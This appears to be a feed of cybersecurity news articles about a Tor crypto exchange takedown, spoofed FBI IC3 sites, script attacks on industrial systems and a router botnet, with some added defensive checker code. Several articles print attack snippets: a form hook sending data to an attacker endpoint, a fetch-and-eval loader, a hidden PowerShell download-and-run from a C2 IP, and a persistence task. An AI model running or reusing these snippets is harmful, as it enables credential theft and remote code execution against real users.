• Canada’s law enforcement community has achieved a landmark victory in the fight against illicit finance with the dismantling of TradeOgre, a Tor-based cryptocurrency exchange that facilitated the theft and laundering of over 56 million dollars in digital assets.

    Emerging in early 2023, TradeOgre operated entirely as a hidden service, leveraging the anonymity of the Tor network to avoid regulatory oversight and conceal the origin of illicit funds.

    By eschewing Know Your Customer (KYC) protocols, the platform enabled users to trade Bitcoin, Monero, Ethereum and a variety of altcoins completely untraceably.

    Initially marketed to privacy-minded traders as a decentralized marketplace, TradeOgre quickly became the go-to venue for cybercriminals seeking to move ransomware payments, darknet proceeds and stolen funds. Transactions were executed through a custom API interface, accessible only via a .onion address.

    Royal Canadian Mounted Police identified anomalous traffic patterns and cluster-analysis indicators pointing to the platform’s involvement in high-value thefts, culminating in a 56-million-dollar seizure on September 18, 2025.

    Behind the façade of privacy, TradeOgre’s backend relied on a suite of open-source components patched with proprietary scripts to automate order matching and deposit processing.

    Although the code was never publicly released, investigators recovered fragments of shell and Python scripts used to orchestrate wallet hot-storage and mixing services, along with configuration files illustrating multi-hop proxy chaining.

    Evading Detection Through Tor and Proxy Chaining

    In its persistence tactics, TradeOgre employed a layered obfuscation strategy. The platform ran on a VM cluster within bullet-proof hosting, each node communicating over Tor circuits and randomized VPN endpoints.

    Investigators recovered a fragment of a proxy setup script that demonstrates how TradeOgre maintained its hidden service:

    # Proxy chaining for TradeOgre hidden service
    sudo apt-get install -y tor privoxy
    # Privoxy listens locally and hands every request to Tor's SOCKS port;
    # the trailing "." makes Privoxy resolve hostnames inside Tor as well
    sudo tee /etc/privoxy/config > /dev/null << EOF
    listen-address 127.0.0.1:8118
    forward-socks5t   /               127.0.0.1:9050 .
    EOF
    sudo systemctl restart privoxy
    # Access API through Tor proxy (the .onion name is resolved by Tor, not locally)
    curl --socks5-hostname 127.0.0.1:9050 http://tradeogrehidden.onion/api/v1/markets

    This multi-layered approach hindered attribution and complicated conventional threat-intelligence tracking, underscoring the challenge of combating darknet-enabled financial crime.


    The post Canada Police Dismantles TradeOgre Platform That Stolen 56 Million Dollars in Cryptocurrency appeared first on Cyber Security News.

  • Subtle Snail, an Iran-linked espionage group also tracked as UNC1549 under the Unyielding Wasp (Tortoiseshell) umbrella of the Charming Kitten network, has shifted its focus to European telecom, aerospace, and defense firms since June 2022. In a recent wave of attacks, the group compromised 34 devices across 11 organizations by masquerading as human resources representatives […]

    The post Subtle Snail Impersonation Tactics: How HR Representatives Can Engage Employees to Steal Login Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • BlackLock, a rebranded ransomware group formerly known as El Dorado, has emerged as a formidable threat to organizations worldwide. First identified in June 2024 when its Dedicated Leak Site (DLS) began exposing victim data, the gang is believed to have been active since March 2024. The latest analysis by AhnLab Security Intelligence Center (ASEC) sheds […]

    The post BlackLock Ransomware Targets Windows, Linux, and VMware ESXi Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A sophisticated spoofing campaign has emerged targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3).

    Beginning in mid-September 2025, victims attempting to access IC3’s official portal were redirected to fraudulent domains crafted to mirror the legitimate site.

    The impersonators employed look-alike URLs—such as “ic3-gov.com” and “ic3gov.org”—and reproduced authentic branding, including the FBI seal and IC3 banner.

    Visitors who entered personal data found their information harvested for identity theft and financial fraud.

    IC3 analysts identified the first wave of these fraudulent sites on September 18, 2025, when multiple reports surfaced of visitors receiving deceptive emails purportedly confirming IC3 report submissions.

    Those messages contained links that led to cloned pages demanding extensive personally identifiable information (PII).

    Although the initial entry point resembled a routine confirmation notice, the campaign’s underlying payload quietly exfiltrated all form data to attacker-controlled servers.

    Following these early alerts, IC3 researchers noted that the spoofed infrastructure was hosted via bulletproof providers, enabling rapid domain rotation and minimal takedown capability.

    Victims who attempted to “report” crimes or update existing reports unwittingly provided names, home addresses, phone numbers, email credentials, Social Security numbers, and banking information—all transmitted in clear text over HTTP.

    In some cases, the cloned pages concealed additional JavaScript modules designed to capture keystrokes and cookies, further compromising visitor security.

    Infection Mechanism and Data Harvesting

    The malicious sites operate purely through phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the legitimate form’s submit event, rerouting user inputs to an exfiltration endpoint before allowing the browser to proceed or display a generic error.

    A representative snippet illustrates this tactic:

    // Hook the cloned complaint form so every submission is copied out before it proceeds
    document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
      evt.preventDefault();                        // hold the real submission
      var formData = new FormData(this);           // snapshot every field the visitor filled in
      fetch('https://malicious-ic3[.]net/collect', {  // attacker-controlled endpoint (defanged)
        method: 'POST',
        body: formData
      }).then(() => this.submit());                // then let the form continue as if nothing happened
    });

    This approach enables seamless data capture without alerting the victim. The script also logs keystrokes via an injected listener on all input fields, collecting credentials and session cookies.

    Because the code is embedded directly in the page’s HTML, traditional antivirus solutions relying on signature-based detection struggle to flag the threat.

    Subsequent network analysis revealed repeated POST requests to the malicious domain shortly after each form submission, confirming successful data exfiltration.

    Professionals are urged to verify the URL, ensure HTTPS with a valid .gov certificate, and report any suspicious IC3-branded pages to the FBI immediately.
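    The URL check urged above, written out as an added example (not code from the article or from IC3): it classifies a URL by scheme and hostname and flags non-.gov hosts carrying IC3 or FBI branding, such as the two look-alike domains named in the report. Certificate validity cannot be checked offline, so the function only covers the scheme and host; the sample URLs at the end are constructed.

```javascript
// Added example: classify a URL the way the advice asks a visitor to.
const LEGIT_HOST = 'ic3.gov';           // registrable domain of the real portal
const BRAND_TOKENS = ['ic3', 'fbi'];    // branding the clones reuse in their hostnames

// Collapse separators so "ic3-gov.com", "ic3gov.org" and "ic3.gov.evil.example"
// all compare on the bare letters; the official host is handled before this runs.
function squashedHost(hostname) {
  return hostname.toLowerCase().replace(/[-_.]/g, '');
}

function checkIc3Url(url) {
  let u;
  try {
    u = new URL(url);
  } catch (e) {
    return { verdict: 'invalid', reason: 'unparseable URL' };
  }
  const host = u.hostname.toLowerCase();
  const officialHost = host === LEGIT_HOST || host.endsWith('.' + LEGIT_HOST);
  if (officialHost && u.protocol === 'https:') {
    return { verdict: 'legitimate', reason: 'official host over HTTPS' };
  }
  if (officialHost) {
    return { verdict: 'suspicious', reason: 'official host, but form data would travel in clear text' };
  }
  const hits = BRAND_TOKENS.filter(t => squashedHost(host).includes(t));
  if (hits.length > 0) {
    return { verdict: 'lookalike', reason: 'IC3 branding (' + hits.join(', ') + ') on a non-.gov host' };
  }
  return { verdict: 'unrelated', reason: 'no IC3 branding in hostname' };
}

// Constructed sample URLs: the two look-alikes from the report plus controls.
const SAMPLE_URLS = [
  'https://www.ic3.gov/',
  'http://www.ic3.gov/',
  'https://ic3-gov.com/report',
  'https://ic3gov.org/',
  'https://example.com/',
];
SAMPLE_URLS.forEach(url => console.log(url, '=>', checkIc3Url(url).verdict));
```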

    The post Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information appeared first on Cyber Security News.

  • We hear this a lot: “We’ve got hundreds of service accounts and AI agents running in the background. We didn’t create most of them. We don’t know who owns them. How are we supposed to secure them?” Every enterprise today runs on more than users. Behind the scenes, thousands of non-human identities, from service accounts to API tokens to AI agents, access systems, move data, and execute tasks

  • A recently disclosed flaw, tracked as CVE-2025-55241, allowed any attacker in possession of a single “Actor token” from a test or lab tenant to assume full administrative control over every Microsoft Entra ID (Azure AD) customer globally. Security researcher Dirk-Jan Mollema revealed that a critical validation error in Microsoft’s token-based service communication could have turned a low-privilege […]

    The post God Mode Vulnerability Lets Attackers Access Any Resource in Microsoft Cloud Tenants appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Industrial automation systems have become the latest battleground for sophisticated cybercriminals who are deploying cleverly crafted malicious scripts and phishing pages to compromise ICS computers.

    Over the first half of 2025, attackers have increasingly shifted to web-based attack vectors, exploiting legacy interfaces, weak authentication, and outdated software in operational technology environments.

    These threat actors deliver malicious JavaScript payloads via compromised websites and phishing emails that mimic legitimate vendor pages or internal dashboards.

    Once a user interacts with the page, the script executes automatically, allowing the adversary to deliver next-stage payloads designed to extract credentials, establish backdoors, and move laterally within the network.

    Detection data from Securelist indicates that the percentage of ICS computers on which malicious scripts and phishing pages were blocked reached 6.49% in Q2 2025, down slightly from the previous quarter.

    Despite the modest decrease, this category remains the most prevalent web-based threat to industrial networks, surpassing traditional malware families such as trojans and keyloggers.

    Regional analysis shows that Africa and South-East Asia saw the highest infection attempts, while Northern Europe remained the least targeted.

    The decline in blocked scripts may reflect both improved defenses and the attackers’ pivot toward more targeted, low-volume campaigns.

    Securelist analysts identified that many of these attacks leverage common industrial protocols—such as Modbus and OPC UA—to embed command sequences within ostensibly benign script hosts.

    By masquerading control commands as part of a legitimate maintenance interface, threat actors can manipulate programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems without triggering conventional antivirus signatures.

    Percentage of ICS computers on which the activity of malicious objects from various categories was blocked (Source – Securelist)

    The attackers often chain multiple JavaScript modules: the initial loader script pulls a second-stage downloader, which in turn retrieves a lightweight reverse shell written in Node[.]js.

    While most incidents involve credential harvesting and reconnaissance, several high-impact campaigns enabled direct manipulation of industrial processes.

    In one case, adversaries altered setpoints on a chemical processing line, causing temperature fluctuations that triggered emergency shutdowns.

    In another, attackers used phishing pages that mimicked a well-known remote support portal to steal privileged accounts, later deploying malicious scripts that disabled safety interlocks.

    These operations underline the urgent need for deep-inspection proxies and multi-factor authentication on all ICS-facing web interfaces.

    Infection Mechanism and Script Delivery

    The initial infection typically begins with a phishing email containing a link to a cloned vendor portal. Upon visiting the page, a JavaScript snippet automatically downloads and executes from an offsite server:

    <script>
    // Loader fetches and executes the second-stage payload
    fetch('http://malicious.example.com/loader.js')
      .then(response => response.text())
      .then(code => eval(code));
    </script>

    The loader script then writes a Node[.]js-based shell to disk and registers it as a system service, ensuring persistence across reboots.

    It also injects WebSocket hooks into the browser process to tunnel PLC commands through the existing network channel.

    Evading detection is further achieved by obfuscating function names and encoding payloads in Base64, only decoding them at runtime.

    Continuous monitoring of web gateway logs and implementing strict content security policies can disrupt this chain of execution and prevent unauthorized script retrieval.
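    To make the content-security-policy point concrete, here is an added example (not code from Securelist or the article): a small evaluator for the two CSP directives that govern the loader above. The fetch() is controlled by connect-src and the eval() by script-src, each falling back to default-src; the page origin and the two policies are constructed values.

```javascript
// Added example: which steps of the loader chain does a given CSP stop?
function parseCsp(header) {
  const policy = {};
  header.split(';').forEach(part => {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  });
  return policy;
}

// Effective source list for a fetch directive, with the default-src fallback.
function sourcesFor(policy, directive) {
  if (policy[directive]) return policy[directive];
  if (policy['default-src']) return policy['default-src'];
  return ['*'];                               // no policy at all: everything is allowed
}

function originMatches(src, pageOrigin, targetOrigin) {
  if (src === '*') return true;
  if (src === "'self'") return targetOrigin === pageOrigin;
  if (src.startsWith("'")) return false;      // 'none', nonces and hashes never match a URL
  try {
    return new URL(src).origin === targetOrigin;   // host-source such as https://cdn.example
  } catch (e) {
    return false;                             // scheme-only or malformed source: treat as no match
  }
}

// Would fetch(url) issued by a page at pageOrigin be permitted?
function fetchAllowed(header, pageOrigin, url) {
  const target = new URL(url).origin;
  return sourcesFor(parseCsp(header), 'connect-src')
    .some(src => originMatches(src, pageOrigin, target));
}

// Would eval(code) be permitted?
function evalAllowed(header) {
  return sourcesFor(parseCsp(header), 'script-src').includes("'unsafe-eval'");
}

const PAGE_ORIGIN = 'https://hmi.example.internal';              // constructed ICS web interface
const LOADER_URL = 'http://malicious.example.com/loader.js';       // offsite loader from the article
const STRICT_CSP = "default-src 'self'; script-src 'self'; connect-src 'self'";
const LAX_CSP = "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'";

console.log('strict: fetch', fetchAllowed(STRICT_CSP, PAGE_ORIGIN, LOADER_URL), 'eval', evalAllowed(STRICT_CSP));
console.log('lax:    fetch', fetchAllowed(LAX_CSP, PAGE_ORIGIN, LOADER_URL), 'eval', evalAllowed(LAX_CSP));
```

Under the strict policy both the offsite fetch and the eval are refused, while the page's own scripts from its origin still load; the lax policy permits the whole chain.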

    The post Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages appeared first on Cyber Security News.

  • In June 2025, a previously unknown ransomware group dubbed Kawa4096 emerged, immediately drawing attention by targeting multinational organizations across diverse industries, including finance, education and services, in countries such as Japan and the United States. While no public evidence confirms a Ransomware-as-a-Service (RaaS) model or partnerships with other cybercriminals, the group’s attacks in multiple countries […]

    The post Kawa4096 Ransomware Targets Multinational Corporations to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybersecurity researchers at Netcraft have uncovered two sophisticated phishing campaigns linked to the Lucid and Lighthouse Phishing-as-a-Service (PhaaS) platforms, revealing a massive operation that has deployed over 17,500 phishing domains targeting 316 brands across 74 countries. This discovery highlights the growing threat of commercialized cybercrime infrastructure that enables low-skilled attackers to conduct sophisticated phishing operations […]

    The post Massive Lucid PhaaS Campaign: 17,500 Phishing Domains Mimic 316 Global Brands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A previously unseen botnet campaign emerged in late November, using a novel combination of DNS misconfiguration and hijacked networking devices to propel a global malspam operation.

    Initial reports surfaced when dozens of organizations received what appeared to be legitimate freight invoices, each containing a ZIP archive with a malicious JavaScript payload.

    Upon execution, the script launched a PowerShell routine to connect to a remote command-and-control server at 62.133.60.137, a host with prior ties to Russian threat actors.

    Infoblox analysts identified that the underlying infrastructure relies on more than 13,000 compromised MikroTik routers, transformed into open SOCKS4 proxies.

    This expansive relay network not only amplifies email delivery volume but also obscures the true origin of attacks, making traditional IP-based filtering ineffective.

    Instead of exploiting a single vulnerability, the campaign capitalizes on the default or poorly secured configurations shipped with many MikroTik devices.

    The spam emails spoofed hundreds of legitimate domains by abusing misconfigured SPF records.

    Domain owners had inadvertently—or through malicious alteration—configured their TXT records with the “all” directive, effectively allowing any mail server to send messages on their behalf.

    The result was a widespread bypass of DKIM, SPF, and DMARC checks, enabling the malicious emails to slip past mail filters into corporate inboxes.
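    The SPF misconfiguration described above, as an added example (not code from Infoblox or the article): a checker that parses an SPF TXT record and reports whether its "all" term is permissive, since a bare "all" carries an implicit "+" qualifier and passes any sender. The domain names and records are constructed samples, not from the campaign.

```javascript
// Added example: audit an SPF record for the permissive "all" term.
function parseSpf(txt) {
  const terms = txt.trim().split(/\s+/);
  if (terms[0].toLowerCase() !== 'v=spf1') return null;     // not an SPF record at all
  return terms.slice(1).map(term => {
    const m = term.match(/^([+\-~?])?(.*)$/);
    return { qualifier: m[1] || '+', body: m[2] };          // no qualifier means "+" (pass)
  });
}

function auditSpf(txt) {
  const terms = parseSpf(txt);
  if (!terms) return { verdict: 'not-spf', finding: 'record does not start with v=spf1' };
  const idx = terms.findIndex(t => t.body.toLowerCase() === 'all');
  if (idx < 0) return { verdict: 'ok', finding: 'no "all" term; unlisted senders evaluate to neutral' };
  const q = terms[idx].qualifier;
  if (q === '+') {
    return { verdict: 'critical', finding: '"' + (q === '+' ? '' : q) + 'all" lets any host send as this domain' };
  }
  if (q === '?') {
    return { verdict: 'warn', finding: '"?all" is neutral and gives receivers nothing to act on' };
  }
  if (idx !== terms.length - 1) {
    return { verdict: 'warn', finding: 'terms after "' + q + 'all" are never evaluated' };
  }
  return { verdict: 'ok', finding: '"' + q + 'all" rejects or softfails unlisted senders' };
}

// Constructed sample records keyed by a constructed domain name.
const SAMPLE_RECORDS = {
  'misconfigured.example': 'v=spf1 include:_spf.mail.example all',
  'explicit-plus.example': 'v=spf1 ip4:203.0.113.0/24 +all',
  'hardened.example':      'v=spf1 ip4:203.0.113.0/24 include:_spf.mail.example -all',
  'softfail.example':      'v=spf1 mx ~all',
  'trailing-terms.example':'v=spf1 -all ip4:203.0.113.5',
  'not-spf.example':       'google-site-verification=abc123',
};

for (const [domain, record] of Object.entries(SAMPLE_RECORDS)) {
  const result = auditSpf(record);
  console.log(domain, result.verdict, '-', result.finding);
}
```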

    This botnet represents a material shift in large-scale spam operations, combining device compromise at the network layer with DNS-level manipulation.

    Victims who opened the attached ZIP archives triggered an obfuscated JavaScript file that deployed the loader script, illustrating the seamless integration of multiple tactics to maximize infection rates and evade detection.

    Infection Mechanism

    The malware’s infection chain begins with an obfuscated JavaScript file inside a ZIP archive.

    Misconfiguration in DNS (Source – Infoblox)

    When run, the script writes and executes a PowerShell loader that reaches out to the C2 server to fetch further payloads.

    The JavaScript code snippet below demonstrates how the PowerShell command is constructed and executed:

    // Build a hidden PowerShell one-liner that downloads the payload and starts it
    var cmd = 'powershell -NoProfile -WindowStyle Hidden -Command ' +
              '"$wc = New-Object System.Net.WebClient; ' +
              '$wc.DownloadFile(\'http://62.133.60.137/payload.exe\', \'C:\\Users\\Public\\payload.exe\'); ' +
              'Start-Process \'C:\\Users\\Public\\payload.exe\'"';
    // WScript.Shell is a COM object and must be instantiated; 0 = hidden window, true = wait for exit
    new ActiveXObject('WScript.Shell').Run(cmd, 0, true);

    Once the loader is active, the PowerShell script validates its execution context by querying Get-ExecutionPolicy.

    Should the policy restrict script runs, the malware temporarily bypasses restrictions using Set-ExecutionPolicy Bypass -Scope Process.

    Next, it establishes persistence by creating a scheduled task named “Updater” that runs at user logon:

    # Task action: start the dropped executable in a hidden PowerShell window
    # (-File only accepts a .ps1 script, so the .exe is launched via -Command)
    $action  = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Start-Process C:\Users\Public\payload.exe"'
    $trigger = New-ScheduledTaskTrigger -AtLogOn
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Updater' -Description 'System Updater'

    This mechanism ensures the payload remains active across reboots, while its network traffic is routed through the botnet’s SOCKS4 proxies.

    The reliance on legitimate network services and legal DNS records blurs the line between benign and malicious activity, posing a significant challenge to defenders and underscoring the urgent need for rigorous DNS configuration audits and router security hardening.

    The post New Botnet Leverages DNS Misconfiguration to Launch Massive Cyber Attack appeared first on Cyber Security News.
